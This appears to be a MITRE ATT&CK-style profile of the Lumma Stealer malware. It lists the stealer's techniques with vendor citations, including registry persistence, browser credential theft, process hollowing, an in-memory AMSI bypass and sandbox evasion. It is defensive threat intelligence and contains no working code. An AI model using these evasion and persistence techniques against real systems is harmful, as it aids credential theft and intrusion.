Lumma Stealer
Associated Software Descriptions |
|
Name | Description |
---|---|
LummaStealer | (Citation: Cybereason LumaStealer Undated) |
Techniques Used |
||||
Domain | ID | Name | Use | |
---|---|---|---|---|
Enterprise | T1071 | .001 | Application Layer Protocol: Web Protocols |
Lumma Stealer has used HTTP and HTTP for command and control communication.(Citation: Qualys LummaStealer 2024)(Citation: Fortinet LummaStealer 2024) |
Enterprise | T1547 | .001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Lumma Stealer has created registry keys to maintain persistence using `HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`.(Citation: Cybereason LumaStealer Undated)(Citation: Netskope LummaStealer 2025) |
Enterprise | T1059 | .001 | Command and Scripting Interpreter: PowerShell |
Lumma Stealer has used PowerShell for initial user execution and other fuctions.(Citation: Qualys LummaStealer 2024)(Citation: Cybereason LumaStealer Undated)(Citation: Netskope LummaStealer 2025)(Citation: Fortinet LummaStealer 2024) |
.006 | Command and Scripting Interpreter: Python |
Lumma Stealer has used malicious Python scripts to execute payloads.(Citation: Cybereason LumaStealer Undated) |
||
.010 | Command and Scripting Interpreter: AutoHotKey & AutoIT |
Lumma Stealer has utilized AutoIt malware scripts and AutoIt executables.(Citation: Qualys LummaStealer 2024)(Citation: Cybereason LumaStealer Undated) |
||
Enterprise | T1555 | .003 | Credentials from Password Stores: Credentials from Web Browsers |
Lumma Stealer has gathered credential and other information from multiple browsers.(Citation: Cybereason LumaStealer Undated)(Citation: Fortinet LummaStealer 2024)(Citation: TrendMicro LummaStealer 2025) |
Enterprise | T1074 | .001 | Data Staged: Local Data Staging |
Lumma Stealer has configured a custom user data directory such as a folder within `%USERPROFILE%\AppData\Roaming` for staging data.(Citation: TrendMicro LummaStealer 2025) |
Enterprise | T1573 | .002 | Encrypted Channel: Asymmetric Cryptography |
Lumma Stealer has used HTTPS for command and control purposes.(Citation: Fortinet LummaStealer 2024) |
Enterprise | T1564 | .003 | Hide Artifacts: Hidden Window |
Lumma Stealer has utilized the .NET `ProcessStartInfo` class features to prevent the process from creating a visible window through setting the `CreateNoWindow` setting to “True,” which allows the executed command or script to run without displaying a command prompt window.(Citation: Fortinet LummaStealer 2024) |
Enterprise | T1574 | .001 | Hijack Execution Flow: DLL |
Lumma Stealer has leveraged legitimate applications to then side-load malicious DLLs during execution.(Citation: Cybereason LumaStealer Undated) |
Enterprise | T1562 | .001 | Impair Defenses: Disable or Modify Tools |
Lumma Stealer has attempted to bypass Windows Antimalware Scan Interface (AMSI) by removing the string “AmsiScanBuffer” from the “clr.dll” module in memory to prevent it from being called.(Citation: Netskope LummaStealer 2025) |
Enterprise | T1036 | .008 | Masquerading: Masquerade File Type |
Lumma Stealer has used payloads that resemble benign file extensions such as .mp3, .accdb, and .pub, though the files contained malicious JavaScript content.(Citation: Netskope LummaStealer 2025) |
Enterprise | T1027 | .013 | Obfuscated Files or Information: Encrypted/Encoded File |
Lumma Stealer has used AES-encrypted payloads contained within PowerShell scripts.(Citation: Qualys LummaStealer 2024) |
Enterprise | T1566 | .001 | Phishing: Spearphishing Attachment |
Lumma Stealer has been delivered through phishing emails with malicious attachments.(Citation: Cybereason LumaStealer Undated) |
.002 | Phishing: Spearphishing Link |
Lumma Stealer has been delivered through phishing emails containing malicious links.(Citation: Cybereason LumaStealer Undated) |
||
Enterprise | T1055 | .012 | Process Injection: Process Hollowing |
Lumma Stealer has used process hollowing leveraging a legitimate program such as “BitLockerToGo.exe” to inject a malicious payload.(Citation: Qualys LummaStealer 2024) |
Enterprise | T1518 | .001 | Software Discovery: Security Software Discovery |
Lumma Stealer has detected antivirus processes using commands such as “tasklist” and “findstr.”(Citation: Qualys LummaStealer 2024) |
Enterprise | T1176 | .001 | Software Extensions: Browser Extensions |
Lumma Stealer has installed a malicious browser extension to target Google Chrome, Microsoft Edge, Opera and Brave browsers for the purpose of stealing data.(Citation: Cybereason LumaStealer Undated) |
Enterprise | T1553 | .002 | Subvert Trust Controls: Code Signing |
Lumma Stealer has used valid code signing digital certificates from ConsolHQ LTD and Verandah Green Limited to appear legitimate.(Citation: TrendMicro LummaStealer 2025) |
Enterprise | T1218 | .005 | System Binary Proxy Execution: Mshta |
Lumma Stealer has used mshta.exe to execute additional content.(Citation: Qualys LummaStealer 2024)(Citation: Netskope LummaStealer 2025) |
.015 | System Binary Proxy Execution: Electron Applications |
Lumma Stealer as leveraged Electron Applications to disable GPU sandboxing to avoid detection by security software.(Citation: TrendMicro LummaStealer 2025) |
||
Enterprise | T1204 | .002 | User Execution: Malicious File |
Lumma Stealer has gained initial execution through victims opening malicious executable files embedded in zip archives, and MSI files within RAR files.(Citation: Cybereason LumaStealer Undated) |
Enterprise | T1497 | .001 | Virtualization/Sandbox Evasion: System Checks |
Lumma Stealer has queried system resources on the victim device to identify if it is executing in a sandbox or virtualized environments, checking usernames, conducting WMI queries for system details, checking for files commonly found in virtualized environments, searching system services, and inspecting process names.(Citation: Fortinet LummaStealer 2024) Lumma Stealer has checked system GPU configurations for sandbox detection.(Citation: TrendMicro LummaStealer 2025) |
References
- Buddy Tancio, Fe Cureg, and Jovit Samaniego, Trend Micro. (2025, January 30). Lumma Stealer’s GitHub-Based Delivery Explored via Managed Detection and Response. Retrieved March 22, 2025.
- Cara Lin, Fortinet. (2024, January 8). Deceptive Cracked Software Spreads Lumma Variant on YouTube. Retrieved March 22, 2025.
- Cybereaon Security Services Team. (n.d.). Your Data Is Under New Lummanagement: The Rise of LummaStealer. Retrieved March 22, 2025.
- Leandro Fróes, Netskope. (2025, January 23). Lumma Stealer: Fake CAPTCHAs & New Techniques to Evade Detection. Retrieved March 22, 2025.
- Vishwajeet Kumar, Qualys. (2024, October 20). Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA. Retrieved March 22, 2025.
Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.